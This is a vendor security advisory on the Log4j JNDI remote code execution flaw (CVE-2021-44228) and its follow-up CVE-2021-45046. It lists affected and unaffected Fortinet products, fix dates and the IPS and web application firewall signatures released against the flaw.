Apache log4j2 log messages substitution (CVE-2021-44228)
Apache Log4j <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled (CVE-2021-44228).
See the Fortinet Blog for more more detail https://www.fortinet.com/blog/psirt-blogs/apache-log4j-vulnerability
The following products are NOT impacted:
FortiClient (All versions)
FortiOS (includes FortiGate & FortiWiFi)
FortiRecorder (inlcudes FortiCamera)
FortiSwitch & FortiSwitchManager
FortiToken & FortiToken Mobile
FortiVoice (includes FortiPhone)
FortiLAN Cloud (includes Switch & AP)
The following products are impacted and fixes are being worked on. This advisory will be updated as soon as ETAa are available:
FortiAIOps - Fixed in version 1.0.2
FortiAnalyzer BigData - Fixed on 2021-12-10 in 6.4.7 & 7.0.2
FortiCASB - Fixed on 2021-12-10
FortiConverter Portal - Fixed on 2021-12-10
FortiCWP - Fixed on 2021-12-10
FortiEDR Cloud - Not exploitable. Additional precautionary mitigations put in place on 2021-12-10
FortiInsight - Not exploitable. Additional precautionary mitigations being investigated.
FortiIsolator - Fix scheduled for version 2.3.4
FortiMonitor - Mitigations for NCM & Elastiflow available
FortiPortal - Fixed in 6.0.8 and 5.3.8
FortiSIEM - Mitigation available
ShieldX - Fix scheduled for versions 2.1 and 3.0 - ETA 2021/12/17
Update: CVE-2021-45046 (CVSS score: 3.9 - Low)
It was found by the Apache Software Foundation (ASF) that the fix they released to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout, with either a Context Lookup or a Thread Context Map pattern, to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack
For full details of protections and detections for the IoCs related to this vulnerability, please see the Log4j2 Vulnerability Outbreak Alert (https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability)
IPS Signature protection (FortiOS)
Fortinet have released& IPS signature Apache.Log4j.Error.Log.Remote.Code.Execution, with VID 51006 to address this threat. This signature was initially released in IPS package (version 19.215),. Please note that, since this is an emergency release, the default action for this signature is set to pass. Please modify the action according to your need.
As of IPS DB version 19.217 this signature was set to drop by default.
IPS Signature protection (FortiADC & FortiProxy)
FortiADC supports IPS signature to mitigate log4j (version 19.215).
FortiProxy supports IPS signature to mitigate log4j (version 19.215).
Web Application Firewall (FortiWeb & FortiWeb Cloud)
Web Application signatures to prevent this vulnerability were first added in database 0.00305 and have been updated in recent releases to add additional coverage
Last Updated: Tuesday December 15, 8:50 PM Pacific Time